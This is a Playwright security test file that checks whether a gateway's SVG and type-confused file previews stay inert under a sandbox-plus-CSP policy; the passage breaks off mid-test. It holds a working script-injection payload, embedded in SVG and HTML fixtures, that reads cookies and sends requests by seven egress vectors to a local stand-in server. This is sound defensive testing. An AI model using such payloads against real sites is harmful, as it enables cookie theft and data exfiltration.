/**
 * preview-svg.spec.ts — ADR-067 stage 1, unit D2: SVG and type confusion.
 *
 * ============================================================================
 * WHY THIS FILE HAD TO EXIST BEFORE `.svg` COULD SHIP
 * ============================================================================
 *
 * §10.4 puts `.svg` on the inline allow-list and then states the condition in
 * the same breath: an SVG is reachable three ways, and "All three must pass
 * before `.svg` ships inline."
 *
 *   94   E2E_SvgWithScript_TopLevel_IsInert   — the token URL, as a DOCUMENT
 *   122  an SVG subresource renders and stays inert — inside a sandboxed bundle
 *   123  TestSvgInSpa_ImageNotDocument        — inside the SPA
 *
 * Test 123's server half exists (pkg/gateway/library_svg_contexts_test.go).
 * Tests 94 and 122 did not exist at all: tests/e2e/preview-isolation.spec.ts is
 * a `test.skip(true, …)` placeholder. `.svg` was already on the shipped
 * allow-list (pkg/gateway/library_mime.go), so a security posture was being
 * asserted with no browser evidence behind it. §10.4 says so itself:
 *
 *   > This is reasoned from the measured HTML result, not separately measured.
 *   > An SVG document under the §10.3 policy was never run.
 *
 * This file runs it. An SVG is not an image for security purposes — it is a
 * document that can carry script — so every assertion here is about what a
 * REAL ENGINE does with a REAL scripted SVG served by the REAL gateway.
 *
 * ============================================================================
 * GROUND TRUTH IS THE SECOND ORIGIN'S REQUEST LOG, NEVER THE PAGE
 * ============================================================================
 *
 * The measurement this file automates
 * (docs/internal/specs/adr-067-preview-isolation-experiment-2026-08-22.md)
 * fixed the oracle, and it is not negotiable:
 *
 *   > Both origins log every request they receive. What arrives was allowed;
 *   > what never arrives was blocked. The in-page JavaScript report is
 *   > corroborating only — a page can misreport what happened to it; a server
 *   > log cannot.
 *
 * So a SECOND origin (`egress`, a local HTTP server on its own ephemeral port)
 * stands in for the internet, and every "nothing leaked" assertion here is
 * "nothing ARRIVED at that server". A page that merely fails to render proves
 * nothing and is never accepted as evidence.
 *
 * Console text is explicitly NOT an oracle. The experiment recorded that the
 * three engines word a violation three different ways, so a string match
 * silently stops matching on a browser update (§4 item 4).
 *
 * ============================================================================
 * EVERY NEGATIVE HERE HAS A POSITIVE CONTROL IN THE SAME RUN
 * ============================================================================
 *
 * "Nothing reached the second origin" is also what a broken harness reports.
 * Each inert-case test is therefore paired with a control that fires the SAME
 * payload, generated by the SAME builder, at the SAME sink, with the isolation
 * removed — and the control MUST show the traffic. A third origin (`control`,
 * a second local server) provides the un-policed origin, exactly as the
 * experiment's `server.py` did.
 *
 * Two further tests, `MUTATION A` and `MUTATION B`, are the answer to "has this
 * test ever been seen to fail?". Each strips ONE half of the §10.3 policy and
 * asserts that the very property the tests above rely on collapses — the sandbox
 * half and the source half separately, because FR-005a's whole claim is that
 * neither alone is sufficient. Neither touches a source file, so both are
 * repeatable in CI on every run and cannot rot into folklore.
 *
 * They reach the mutation two different ways, and the difference is measured
 * rather than stylistic:
 *
 *   MUTATION A rewrites the header on the REAL gateway response in flight, via
 *   `page.route`. Its oracle is the opaque origin and the cookie read.
 *
 *   MUTATION B cannot use that mechanism, and the reason is worth recording
 *   because it would otherwise look like a false negative. A document delivered
 *   by `route.fulfill()` has no real network provenance, and Chromium then
 *   refuses every cross-origin subresource it issues to a loopback address —
 *   measured here: identical payload, identical `sandbox allow-scripts` header,
 *   `img`/`fetch`/`beacon` all fire and the in-page report is identical, yet the
 *   sink records NOTHING when the document arrived via `fulfill` and records all
 *   three when it arrived over the wire. A mutation harness that silently
 *   suppresses the very traffic it is trying to provoke would have "proved" the
 *   product safe. So MUTATION B is served over a real socket by the control
 *   origin instead — the SAME payload bytes, from the SAME origin as its paired
 *   negative, differing ONLY in the policy string, which is what makes the
 *   difference in outcome attributable to the policy and to nothing else.
 *
 * ============================================================================
 * RETRIES ARE ZERO, DELIBERATELY (SC-012, §13.4)
 * ============================================================================
 *
 * The suite-wide `retries: process.env.CI ? 3 : 2` exists for real-LLM latency
 * variance. Nothing here calls an LLM, and "the cookie was not readable" and
 * "nothing reached the external origin" are not properties a fourth attempt
 * establishes — a security assertion allowed to retry reports identically to
 * one that passed first time.
 *
 * Retries are therefore pinned to zero TWICE, on purpose:
 *   1. at PROJECT level — this file is listed in `ISOLATION_SPEC_FILES` in
 *      playwright.config.ts, and the three `isolation-*` projects set
 *      `retries: 0`, so raising the global number cannot reach it; and
 *   2. at FILE level, immediately below, so that running this file under any
 *      other project (or a future config edit) still cannot retry it.
 *
 * ============================================================================
 * ENGINES
 * ============================================================================
 *
 * Chromium, Firefox and WebKit, via the three `isolation-*` projects. WebKit is
 * not Safari and no macOS runner is planned — Safari proper stays uncovered,
 * deliberately and on the record (SC-012).
 */
import { expect, request as playwrightRequest, test, type APIRequestContext, type Page } from '@playwright/test';
import { createServer, type IncomingMessage, type Server, type ServerResponse } from 'node:http';
import type { AddressInfo } from 'node:net';
import type { Socket } from 'node:net';
import {
  GATEWAY_ORIGIN_PLACEHOLDER,
  expectedIsolationPolicy,
  gatewayCanonicalOrigin,
  gatewayOriginSources,
} from './fixtures/preview-isolation/policy-oracle.js';

// FILE-level retry pin. See the header: this is the second of two independent
// places that hold it at zero.
test.describe.configure({ retries: 0 });

const BASE_URL = process.env.OMNIPUS_URL || 'http://localhost:6060';
const AUTH_FILE = process.env.OMNIPUS_AUTH_FILE || './tests/e2e/fixtures/.auth/admin.json';

/**
 * The ADR-067 §10.3 policy this gateway must serve, byte for byte.
 *
 * STILL READ FROM THE SPEC, NOT FROM pkg/gateway — the direction is the whole
 * point of an oracle, and nothing about that has changed: a test that reads its
 * expected value out of the implementation asserts only that the implementation
 * equals itself, and would keep passing while a directive was quietly dropped.
 *
 * WHAT CHANGED, 2026-08-23. §10.3 is no longer a fixed literal that could be
 * transcribed here. It is a TEMPLATE with one named placeholder,
 * `${GATEWAY_ORIGIN}`, and the substitution depends on the gateway's own
 * configuration — because `'self'` matches nothing inside an
 * attribute-sandboxed WebKit iframe, so the six subresource directives name the
 * gateway's origin as well. A hand-transcribed literal cannot express that, and
 * the old one is now simply the wrong string.
 *
 * So the expected value is assembled by `expectedIsolationPolicy()`, which
 * reads §10.3's template out of the specification's own markdown and applies
 * §10.3's substitution table to `$OMNIPUS_HOME/config.json`. Read that module's
 * header before touching this — in particular the note explaining why the
 * origin comes from the GATEWAY'S config and NOT from `BASE_URL`, which is the
 * one thing here that looks like a bug and is not.
 */
const ISOLATION_POLICY = expectedIsolationPolicy();

/** The prefix §10.3's sandbox half occupies, used to derive the two mutations. */
const SANDBOX_PREFIX = 'sandbox allow-scripts; ';

/**
 * MUTATION A — the source directives alone, sandbox removed.
 *
 * This is the experiment's `nosandbox` row, whose measured result is half the
 * reason FR-005a says BOTH mechanisms are required: origin no longer opaque,
 * `document.cookie` READABLE (`omnipus_probe=SECRET`), and `window.open` still
 * reaching the second origin on all three engines, because no CSP directive
 * covers popup navigation.
 *
 * The test built on it asserts the first two — the origin and the cookie —
 * because they are the exact properties test 94 relies on. The popup half is
 * deliberately NOT asserted: a non-gesture `window.open` is at the mercy of
 * each engine's popup blocker, so making it an assertion would trade a proof
 * for a flake. It was observed arriving on Chromium during this file's own
 * bring-up; that is a recorded observation, not a claim about all engines.
 */
const SOURCES_ONLY_POLICY = ISOLATION_POLICY.slice(SANDBOX_PREFIX.length);

/**
 * MUTATION B — the sandbox directive alone, source directives removed.
 *
 * The experiment's `sandboxonly` row: origin sealed and the cookie unreadable,
 * but FIVE of seven egress vectors (beacon, fetch, img, iframe, ws) still
 * reaching the second origin.
 */
const SANDBOX_ONLY_POLICY = 'sandbox allow-scripts';

/**
 * The vectors MUTATION B must show escaping.
 *
 * A subset of the experiment's five, and deliberately not all of them: `iframe`
 * and `ws` are recorded there for an HTML fixture, and this is an SVG document
 * whose foreignObject-hosted iframe is a different construction. These three
 * are the ones the SVG payload can fire unconditionally, and three of three
 * arriving is already conclusive — the assertion this mutation exists to break
 * is "the list is EMPTY".
 */
const MUTATION_B_ESCAPES: readonly Vector[] = ['img', 'fetch', 'beacon'];

/**
 * Expected `Content-Type` values.
 *
 * Derived from §10.4 (which extensions exist) and FR-015c (each gets "a
 * specific type", never octet-stream) — the literals are the registered IANA /
 * MDN types those requirements name. FR-015b forbids consulting the host MIME
 * registry, so these must hold on every machine, which is exactly what makes
 * them safe to hardcode here.
 */
const TYPE_SVG = 'image/svg+xml';
const TYPE_HTML = 'text/html; charset=utf-8';
/** FR-015c's one stated default for an extension absent from the table. */
const TYPE_UNKNOWN = 'application/octet-stream';

/**
 * How long a page is given to leak before "nothing arrived" is believed.
 *
 * The number is load-bearing in one direction only: too SHORT and a negative
 * passes because the request had not been made yet. That failure mode is closed
 * structurally rather than by picking a big number — every positive control
 * waits the SAME budget and must SEE its traffic inside it. If this value were
 * ever too small, the controls go red first.
 */
const SETTLE_MS = 2_500;

/** The seven egress vectors the experiment measured. */
const VECTORS = ['img', 'fetch', 'beacon', 'ws', 'iframe', 'form', 'popup'] as const;
type Vector = (typeof VECTORS)[number];

// ─────────────────────────────────────────────────────────────────────────────
// The second origin: a request sink that records what ARRIVES.
// ─────────────────────────────────────────────────────────────────────────────

interface Hit {
  /** Request path, e.g. `/x/doc/img`. */
  path: string;
  method: string;
  /** Whatever cookie header the browser chose to send, if any. */
  cookie?: string;
}

interface Sink {
  origin: string;
  hits: Hit[];
  close: () => Promise<void>;
}

/**
 * Start the stand-in-for-the-internet origin.
 *
 * It answers everything 200 with a permissive CORS header, and records every
 * request — including WebSocket upgrades, which Node routes to the `upgrade`
 * event and NOT to the request handler. Missing that event is how a WebSocket
 * probe silently becomes "nothing arrived".
 */
async function startSink(): Promise<Sink> {
  const hits: Hit[] = [];
  const sockets = new Set<Socket>();

  const record = (req: IncomingMessage) => {
    hits.push({
      path: (req.url || '').split('?')[0],
      method: req.method || 'GET',
      cookie: req.headers.cookie,
    });
  };

  const server = createServer((req: IncomingMessage, res: ServerResponse) => {
    record(req);
    res.writeHead(200, {
      'Content-Type': 'text/plain',
      'Access-Control-Allow-Origin': '*',
      'Content-Length': '2',
    });
    res.end('ok');
  });
  server.on('upgrade', (req: IncomingMessage, socket: Socket) => {
    record(req);
    socket.destroy();
  });
  server.on('connection', (s: Socket) => {
    sockets.add(s);
    s.on('close', () => sockets.delete(s));
  });

  await new Promise<void>((resolve) => server.listen(0, '127.0.0.1', resolve));
  const port = (server.address() as AddressInfo).port;

  return {
    origin: `http://127.0.0.1:${port}`,
    hits,
    close: () => closeServer(server, sockets),
  };
}

// ─────────────────────────────────────────────────────────────────────────────
// The control origin: the same bytes, with the isolation removed.
// ─────────────────────────────────────────────────────────────────────────────

interface ControlOrigin {
  origin: string;
  /**
   * Register a file the control origin will serve.
   *
   * `policy` is optional and is the whole reason this origin can carry the
   * proof-of-failure rows: the SAME bytes are served twice from the SAME
   * origin, differing ONLY in the Content-Security-Policy header, so any
   * difference in what reaches the sink is attributable to the policy string
   * and to nothing else.
   */
  put: (name: string, body: string, contentType: string, policy?: string) => void;
  close: () => Promise<void>;
}

/**
 * Start the un-policed origin used by every positive control.
 *
 * It mirrors the experiment's `server.py`: extension-independent explicit
 * types, `nosniff` always, `Content-Disposition: inline`, a readable probe
 * cookie, and NO Content-Security-Policy at all. The probe cookie is what makes
 * the cookie assertions non-vacuous — the experiment's `nosandbox` row read
 * back `omnipus_probe=SECRET`, and a control that could not read a cookie
 * either would prove nothing about the sandboxed case.
 */
async function startControlOrigin(): Promise<ControlOrigin> {
  const files = new Map<string, { body: string; contentType: string; policy?: string }>();

  const server = createServer((req: IncomingMessage, res: ServerResponse) => {
    const name = (req.url || '').split('?')[0].replace(/^\//, '');
    const file = files.get(name);
    if (!file) {
      res.writeHead(404, { 'Content-Type': 'text/plain', 'Content-Length': '9' });
      res.end('not found');
      return;
    }
    const buf = Buffer.from(file.body, 'utf-8');
    const headers: Record<string, string> = {
      'Content-Type': file.contentType,
      'X-Content-Type-Options': 'nosniff',
      'Content-Disposition': 'inline',
      'Content-Length': String(buf.length),
      'Set-Cookie': 'omnipus_probe=SECRET; Path=/; SameSite=Strict',
    };
    if (file.policy) headers['Content-Security-Policy'] = file.policy;
    res.writeHead(200, headers);
    res.end(buf);
  });

  const sockets = new Set<Socket>();
  server.on('connection', (s: Socket) => {
    sockets.add(s);
    s.on('close', () => sockets.delete(s));
  });

  await new Promise<void>((resolve) => server.listen(0, '127.0.0.1', resolve));
  const port = (server.address() as AddressInfo).port;

  return {
    origin: `http://127.0.0.1:${port}`,
    put: (name, body, contentType, policy) => files.set(name, { body, contentType, policy }),
    close: () => closeServer(server, sockets),
  };
}

function closeServer(server: Server, sockets: Set<Socket>): Promise<void> {
  for (const s of sockets) s.destroy();
  return new Promise<void>((resolve) => server.close(() => resolve()));
}

// ─────────────────────────────────────────────────────────────────────────────
// The payload. ONE builder, used by every case and every control.
// ─────────────────────────────────────────────────────────────────────────────

/**
 * The exfiltration script every payload carries, parameterised only by which
 * sink URL prefix it reports to.
 *
 * ONE builder on purpose: a passing control and a failing negative must not be
 * explainable by "different fixtures". The only thing that differs between a
 * case and its control is the `caseTag`, which segregates the hit log so a late
 * beacon from an earlier test can never be counted against a later one.
 *
 * Vectors, and why each is here (they are the seven the experiment measured):
 *   img/fetch/beacon/ws/iframe — blocked by the SOURCE directives
 *   form/popup                 — blocked ONLY by the sandbox directive, because
 *                                no CSP directive covers popup navigation
 *
 * The form submit is NOT fired by the payload. It is published as
 * `window.__fireForm()` and fired by the TEST, after the in-page report has been
 * read. This fixes, rather than inherits, the experiment's own recorded harness
 * defect — "with no policy the form-submit probe navigates the document away
 * before the in-page report runs, so the `none` row has no report and a racy
 * egress list" (§6, "Known harness defect").
 *
 * A timer was tried first and is not good enough: with the form on a 400 ms
 * delay, Firefox 151 navigated the un-policed control page to the sink before
 * the test could read either `document.title` or `window.__REPORT__`, and both
 * came back EMPTY — a control that reports "the payload did nothing" for a
 * payload that in fact did everything. Chromium and WebKit happened to win the
 * same race, which is the worst possible outcome: two engines green, one red,
 * for a reason that has nothing to do with the product.
 */
function exfilScript(sinkOrigin: string, caseTag: string): string {
  return `
(function(){
  var U = function(v){ return ${JSON.stringify(sinkOrigin)} + "/x/${caseTag}/" + v; };
  var r = { fired: [] };
  try { r.origin = String(window.origin); } catch (e) { r.origin = "THREW:" + e.name; }
  try { r.cookie = document.cookie; } catch (e) { r.cookie = "THREW:" + e.name; }
  try { new Image().src = U("img"); r.fired.push("img"); } catch (e) {}
  try { fetch(U("fetch"), { mode: "no-cors" }).catch(function(){}); r.fired.push("fetch"); } catch (e) {}
  try { if (navigator.sendBeacon(U("beacon"), "x")) r.fired.push("beacon"); } catch (e) {}
  try { new WebSocket(U("ws").replace("http", "ws")); r.fired.push("ws"); } catch (e) {}
  var host = document.getElementById("host") || document.body || document.documentElement;
  try {
    var fr = document.createElementNS("http://www.w3.org/1999/xhtml", "iframe");
    fr.setAttribute("src", U("iframe")); host.appendChild(fr); r.fired.push("iframe");
  } catch (e) {}
  try { if (window.open(U("popup"))) r.fired.push("popup"); else r.fired.push("popup-returned-null"); } catch (e) {}
  window.__REPORT__ = r;
  // Fired by the test, never on a timer — see this builder's doc comment.
  window.__fireForm = function(){
    try {
      var fm = document.createElementNS("http://www.w3.org/1999/xhtml", "form");
      fm.setAttribute("action", U("form")); fm.setAttribute("method", "GET");
      host.appendChild(fm); fm.submit();
    } catch (e) {}
  };
})();
`;
}

/**
 * A scripted SVG.
 *
 * `width`/`height` are intrinsic so that "the browser DECODED this exact image"
 * is assertable as `naturalWidth === 64` rather than as the far weaker "the
 * request returned 200" — which is true of a broken image too (test 122 spells
 * this out: "Asserts the image DECODED — not merely a 200").
 *
 * The script sits inside `<foreignObject>`'s host div for the two vectors that
 * need HTML elements. CDATA because this is XML: an unescaped `&` or `<` in the
 * script would make the document unparseable, and an unparseable payload proves
 * nothing about what a parseable one would do.
 */
function scriptedSvg(sinkOrigin: string, caseTag: string, width = 64, height = 32): string {
  return `<svg xmlns="http://www.w3.org/2000/svg" width="${width}" height="${height}" viewBox="0 0 ${width} ${height}">
<rect width="${width}" height="${height}" fill="#D4AF37"/>
<foreignObject width="1" height="1"><div xmlns="http://www.w3.org/1999/xhtml" id="host"></div></foreignObject>
<script type="application/ecmascript"><![CDATA[
${exfilScript(sinkOrigin, caseTag)}
]]></script>
</svg>
`;
}

/**
 * An HTML document that announces itself loudly if it is ever EXECUTED.
 *
 * Reused in shape from the committed experiment fixture
 * `docs/internal/experiments/preview-isolation/fixture2/evil.pdf` — the same
 * `document.title = "EVIL_EXECUTED"` marker plus cookie beacon that measured
 * §6A.3's type-confusion result. Keeping the marker identical means a future
 * reader can line this test up against that measurement directly.
 */
function evilHtml(sinkOrigin: string, caseTag: string): string {
  return `<!doctype html><html><head><meta charset="utf-8"><title>inert</title></head><body>
<h1 id="evil-marker">IF YOU SEE THIS AS A PAGE, TYPE CONFUSION SUCCEEDED</h1>
<div id="host"></div>
<script>
document.title = "EVIL_EXECUTED";
${exfilScript(sinkOrigin, caseTag)}
</script>
</body></html>
`;
}

/** The bundle page whose only interesting content is `<img src="logo.svg">`. */
function bundleIndexHtml(): string {
  return `<!doctype html><html><head><meta charset="utf-8"><title>svg subresource bundle</title></head><body>
<img id="logo" src="logo.svg" alt="logo">
<div id="host"></div>
</body></html>
`;
}

/**
 * An un-policed page that embeds the SAME logo.svg through `<object>`.
 *
 * This is test 122's positive control, and it is the only shape that works.
 * `<img>` runs an SVG in secure static mode on EVERY engine, so "the same
 * bundle with no policy" would ALSO show zero hits — a control that cannot
 * distinguish a working policy from a dead payload. `<object>` is precisely the
 * embed test 122 names as the refactor that would break the property silently,
 * so the control doubles as a demonstration of what that refactor would cost.
 */
function objectControlHtml(svgName: string): string {
  return `<!doctype html><html><head><meta charset="utf-8"><title>object control</title></head><body>
<object id="obj" type="image/svg+xml" data="${svgName}" width="64" height="32"></object>
</body></html>
`;
}

// ─────────────────────────────────────────────────────────────────────────────
// Gateway plumbing: workspace, fixture upload, one preview token.
// ─────────────────────────────────────────────────────────────────────────────

/** Library-relative directory this spec owns. Fixed, and wiped before use. */
const FIXTURE_DIR = 'e2e-preview-svg';

const FILE_SCRIPTED_SVG = 'scripted.svg';
const FILE_LOGO_SVG = 'logo.svg';
const FILE_INDEX_HTML = 'index.html';
/** HTML bytes, `.svg` name — the forward type-confusion case. */
const FILE_CONFUSED_SVG = 'confused.svg';
/** SVG bytes, `.html` name — the reverse. */
const FILE_CONFUSED_HTML = 'confused.html';
/** HTML bytes under an extension on no table at all (FR-015c's stated default). */
const FILE_UNKNOWN_EXT = 'payload.omnipusunknown';

let sink: Sink;
let control: ControlOrigin;
let api: APIRequestContext;
let workspaceID: string;
let previewToken: string;

/** Gateway-relative token URL for one file in the fixture bundle. */
function tokenURL(name: string): string {
  return `/library-preview/${previewToken}/${FIXTURE_DIR}/${name}`;
}

/** Absolute token URL, for `page.goto` and `page.route`. */
function tokenHref(name: string): string {
  return `${BASE_URL}${tokenURL(name)}`;
}

/**
 * The double-submit CSRF echo every state-changing call needs.
 *
 * `page.request`/`APIRequestContext` carry the cookie jar automatically, but the
 * gateway additionally requires the same csrf value back as a header — see
 * pkg/gateway/middleware/csrf.go.
 */
async function csrfHeaders(ctx: APIRequestContext): Promise<Record<string, string>> {
  const state = await ctx.storageState();
  const cookie = state.cookies.find((c) => c.name === 'csrf' || c.name === '__Host-csrf');
  return cookie ? { 'X-CSRF-Token': cookie.value } : {};
}

test.beforeAll(async () => {
  sink = await startSink();
  control = await startControlOrigin();

  api = await playwrightRequest.newContext({ baseURL: BASE_URL, storageState: AUTH_FILE });
  const csrf = await csrfHeaders(api);

  // Pick a workspace. Any workspace with a work tree will do; the property
  // under test is a property of the serving path, not of a particular tree.
  const wsRes = await api.get('/api/v1/library/workspaces');
  expect(wsRes.status(), 'GET /api/v1/library/workspaces').toBe(200);
  const workspaces = (await wsRes.json()) as Array<{ id: string; name: string }>;
  expect(
    workspaces.length,
    'no workspace with a work tree exists — the Library preview path cannot be exercised',
  ).toBeGreaterThan(0);
  workspaceID = workspaces[0].id;

  // Wipe then recreate, so a rerun is idempotent and a stale byte from an
  // earlier run can never be the thing under test. Deleting first also revokes
  // any preview token still live over the path (FR-003d).
  await api.delete(
    `/api/v1/library/${workspaceID}/entries?path=${encodeURIComponent(FIXTURE_DIR)}`,
    { headers: csrf },
  );
  const mkdir = await api.post(`/api/v1/library/${workspaceID}/mkdir`, {
    headers: { ...csrf, 'Content-Type': 'application/json' },
    data: { path: FIXTURE_DIR },
  });
  expect(mkdir.status(), `mkdir ${FIXTURE_DIR}: ${await mkdir.text()}`).toBeLessThan(300);

  const svgDoc = scriptedSvg(sink.origin, 'doc');
  const svgLogo = scriptedSvg(sink.origin, 'imgtoken');
  const svgLogoControl = scriptedSvg(sink.origin, 'imgctrl');
  const evilForSvgName = evilHtml(sink.origin, 'confusedsvg');
  const evilForControl = evilHtml(sink.origin, 'confusedctrl');
  const evilForUnknownExt = evilHtml(sink.origin, 'unknownext');
  const svgUnderHtmlName = scriptedSvg(sink.origin, 'confusedhtml');
  const svgUnderHtmlNameControl = scriptedSvg(sink.origin, 'confusedhtmlctrl');

  const upload = await api.post(
    `/api/v1/library/${workspaceID}/upload?path=${encodeURIComponent(FIXTURE_DIR)}`,
    {
      headers: csrf,
      multipart: {
        f0: { name: FILE_SCRIPTED_SVG, mimeType: TYPE_SVG, buffer: Buffer.from(svgDoc) },
        f1: { name: FILE_LOGO_SVG, mimeType: TYPE_SVG, buffer: Buffer.from(svgLogo) },
        f2: { name: FILE_INDEX_HTML, mimeType: 'text/html', buffer: Buffer.from(bundleIndexHtml()) },
        f3: { name: FILE_CONFUSED_SVG, mimeType: TYPE_SVG, buffer: Buffer.from(evilForSvgName) },
        f4: { name: FILE_CONFUSED_HTML, mimeType: 'text/html', buffer: Buffer.from(svgUnderHtmlName) },
        f5: {
          name: FILE_UNKNOWN_EXT,
          mimeType: 'application/octet-stream',
          buffer: Buffer.from(evilForUnknownExt),
        },
      },
    },
  );
  expect(upload.status(), `upload fixtures: ${await upload.text()}`).toBeLessThan(300);

  // The control origin serves the SAME payloads with no policy at all.
  control.put(FILE_SCRIPTED_SVG, scriptedSvg(sink.origin, 'docctrl'), TYPE_SVG);
  control.put(FILE_LOGO_SVG, svgLogoControl, TYPE_SVG);
  control.put('object-control.html', objectControlHtml(FILE_LOGO_SVG), TYPE_HTML);
  control.put('evil-as-html.html', evilForControl, TYPE_HTML);
  control.put('svg-as-html.html', svgUnderHtmlNameControl, TYPE_HTML);
  // MUTATION B's pair: identical bytes, identical origin, one differs from the
  // other ONLY by the policy header.
  control.put('policy-full.svg', scriptedSvg(sink.origin, 'mutfull'), TYPE_SVG, ISOLATION_POLICY);
  control.put(
    'policy-sandbox-only.svg',
    scriptedSvg(sink.origin, 'mutbsandboxonly'),
    TYPE_SVG,
    SANDBOX_ONLY_POLICY,
  );

  // ONE token for the whole directory. Bundle scope, so every fixture above is
  // reachable through it — and, just as importantly, only ONE credential is
  // minted per run: the store caps live tokens per session (FR-003k), and three
  // engine projects share this suite's one admin session.
  const mint = await api.post('/api/v1/library/preview-token', {
    headers: { ...csrf, 'Content-Type': 'application/json' },
    data: { workspace_id: workspaceID, path: FIXTURE_DIR, scope: 'bundle', entry_path: FILE_INDEX_HTML },
  });
  // 201, from contracts/openapi.yaml's `/library/preview-token` — the only
  // success status that operation declares.
  expect(mint.status(), `mint preview token: ${await mint.text()}`).toBe(201);
  const minted = (await mint.json()) as { token: string; url: string };
  previewToken = minted.token;
  expect(previewToken, 'minted token').toBeTruthy();
});

test.afterAll(async () => {
  if (api) {
    const csrf = await csrfHeaders(api);
    await api
      .delete(`/api/v1/library/${workspaceID}/entries?path=${encodeURIComponent(FIXTURE_DIR)}`, {
        headers: csrf,
      })
      .catch(() => undefined);
    await api.dispose();
  }
  await sink?.close();
  await control?.close();
});

// ─────────────────────────────────────────────────────────────────────────────
// Hit-log helpers. The only oracle for egress.
// ─────────────────────────────────────────────────────────────────────────────

/**
 * A watermark into the hit log, taken at the start of a test.
 *
 * Case tags segregate one payload from another; this segregates one RUN of a
 * payload from the next. Three tests below drive the SAME served file
 * (scripted.svg) under three different policies, so without a watermark the
 * `popup` that MUTATION A legitimately produces is still sitting in the log
 * when MUTATION B reads it — which is exactly how it first failed, reporting
 * `["popup"]` for a run in which nothing had leaked at all. A stale hit
 * counted against a later test is a false RED; the same mechanism the other
 * way round would be a false GREEN.
 */
function mark(): number {
  return sink.hits.length;
}

/** Every vector name recorded for one case tag since `from`, in arrival order. */
function arrived(caseTag: string, from: number): string[] {
  const prefix = `/x/${caseTag}/`;
  return sink.hits
    .slice(from)
    .filter((h) => h.path.startsWith(prefix))
    .map((h) => h.path.slice(prefix.length));
}

/** Wait until every named vector has arrived, or the settle budget expires. */
async function waitForVectors(
  caseTag: string,
  from: number,
  wanted: readonly Vector[],
): Promise<string[]> {
  const deadline = Date.now() + SETTLE_MS;
  for (;;) {
    const got = arrived(caseTag, from);
    if (wanted.every((v) => got.includes(v))) return got;
    if (Date.now() > deadline) return got;
    await new Promise((r) => setTimeout(r, 50));
  }
}

/** Spend the FULL settle budget, then report what arrived. The negative oracle. */
async function settleThenRead(caseTag: string, from: number): Promise<string[]> {
  await new Promise((r) => setTimeout(r, SETTLE_MS));
  return arrived(caseTag, from);
}

interface PageReport {
  fired?: string[];
  origin?: string;
  cookie?: string;
}

/**
 * Fire the form-submit probe, in every frame that published one.
 *
 * Called AFTER the report has been read, because a successful form submit
 * navigates its document away and takes both `document.title` and
 * `window.__REPORT__` with it. Frames are walked rather than just the main one
 * so the `<object>`-hosted SVG control is covered too.
 */
async function fireDeferredForm(page: Page): Promise<void> {
  for (const frame of page.frames()) {
    const call = frame
      .evaluate(() => {
        const w = window as unknown as { __fireForm?: () => void };
        if (typeof w.__fireForm === 'function') w.__fireForm();
      })
      .catch(() => undefined);
    // Bounded, because one of the frames on these pages is the BLOCKED iframe
    // probe. WebKit leaves that frame in a state where `evaluate` never
    // settles: measured, the unbounded version turned a 6.6 s pass into a 1.8 m
    // timeout on WebKit alone. A frame that will not answer has no form to
    // fire, so moving on loses nothing.
    await Promise.race([call, new Promise((r) => setTimeout(r, 2_000))]);
  }
}

/** Read the in-page corroborating report. Never the primary oracle. */
async function readReport(page: Page): Promise<PageReport> {
  return page.evaluate(() => {
    const w = window as unknown as { __REPORT__?: PageReport };
    return w.__REPORT__ ?? {};
  });
}

/**
 * Serve one gateway URL through `page.route` with its policy header rewritten.
 *
 * The BYTES stay the gateway's. Only the header changes, and only for the one
 * URL named — which is what makes this a mutation of the control under test
 * rather than a simulation of it.
 */
async function withMutatedPolicy(
  page: Page,
  url: string,
  policy: string,
  body: () => Promise<void>,
): Promise<void> {
  await page.route(url, async (route) => {
    const res = await route.fetch();
    const headers: Record<string, string> = { ...res.headers() };
    // Both spellings, because header maps are case-normalised differently by
    // engine and a leftover original would silently win.
    delete headers['content-security-policy'];
    delete headers['Content-Security-Policy'];
    // route.fetch() returns a decoded body, so the original framing headers no
    // longer describe it.
    delete headers['content-encoding'];
    delete headers['content-length'];
    headers['content-security-policy'] = policy;
    await route.fulfill({ status: res.status(), headers, body: await res.body() });
  });
  try {
    await body();
  } finally {
    await page.unroute(url);
  }
}

// ─────────────────────────────────────────────────────────────────────────────
// Tests
// ─────────────────────────────────────────────────────────────────────────────

test.describe('ADR-067 §10.4 — .svg on the inline allow-list, and type confusion', () => {
  /**
   * The mutations must actually mutate. A derivation that silently produced the
   * original string would turn both proof-of-failure tests below into tests
   * that assert nothing, and they would still be green.
   */
  test('the two policy mutations are genuinely different from the shipped policy', () => {
    expect(ISOLATION_POLICY.startsWith(SANDBOX_PREFIX)).toBe(true);
    expect(SOURCES_ONLY_POLICY).not.toBe(ISOLATION_POLICY);
    expect(SOURCES_ONLY_POLICY).not.toContain('sandbox');
    expect(SANDBOX_ONLY_POLICY).not.toBe(ISOLATION_POLICY);
    expect(SANDBOX_ONLY_POLICY).not.toContain('default-src');
  });

  /**
   * The ORACLE must have substituted, and it must have substituted correctly.
   *
   * Without this, the byte-exact assertions below would be satisfied by an
   * oracle that quietly produced §10.3's EMPTY case — the collapsed `'self'`
   * form — while the gateway also produced it, and both would be wrong
   * together: every Safari preview in that configuration renders blank. The
   * empty case is legitimate (a wildcard bind with no `gateway.public_url`) and
   * the gateway logs a WARN for it, so it is not asserted away here — it is
   * asserted ALOUD, with the derivation printed, so a run in that configuration
   * says which case it measured instead of silently measuring the weaker one.
   *
   * Read off §10.3's substitution table, never off the served header:
   *   • a placeholder never survives into a served policy;
   *   • the empty case collapses `'self' ${GATEWAY_ORIGIN}` to `'self'` with NO
   *     double space anywhere — the failure that is invisible in both strings;
   *   • otherwise every derived source appears, and a loopback bind yields all
   *     three spellings.
   */
  test('the policy oracle substituted §10.3\'s placeholder, and says which case it took', () => {
    const canonical = gatewayCanonicalOrigin();
    const sources = gatewayOriginSources(canonical);
    const evidence =
      `canonical origin: ${canonical || '(none — wildcard bind and no gateway.public_url)'} | ` +
      `substituted sources: ${sources.length ? sources.join(' ') : '(none — §10.3 empty case)'} | ` +
      `policy: ${ISOLATION_POLICY}`;

    expect(ISOLATION_POLICY, `a placeholder must never survive substitution. ${evidence}`)
      .not.toContain(GATEWAY_ORIGIN_PLACEHOLDER);
    expect(ISOLATION_POLICY, `§10.3 forbids a double space in every case. ${evidence}`)
      .not.toContain('  ');

    if (sources.length === 0) {
      // The empty case, stated rather than skipped past. This gateway serves
      // previews that WebKit renders without CSS or JS; §10.3 accepts that and
      // requires a WARN, and this suite must not report it as the normal case.
      expect(ISOLATION_POLICY, `§10.3 empty case must collapse to 'self' exactly. ${evidence}`)
        .toContain("script-src 'self' 'unsafe-inline'");
      return;
    }

    for (const source of sources) {
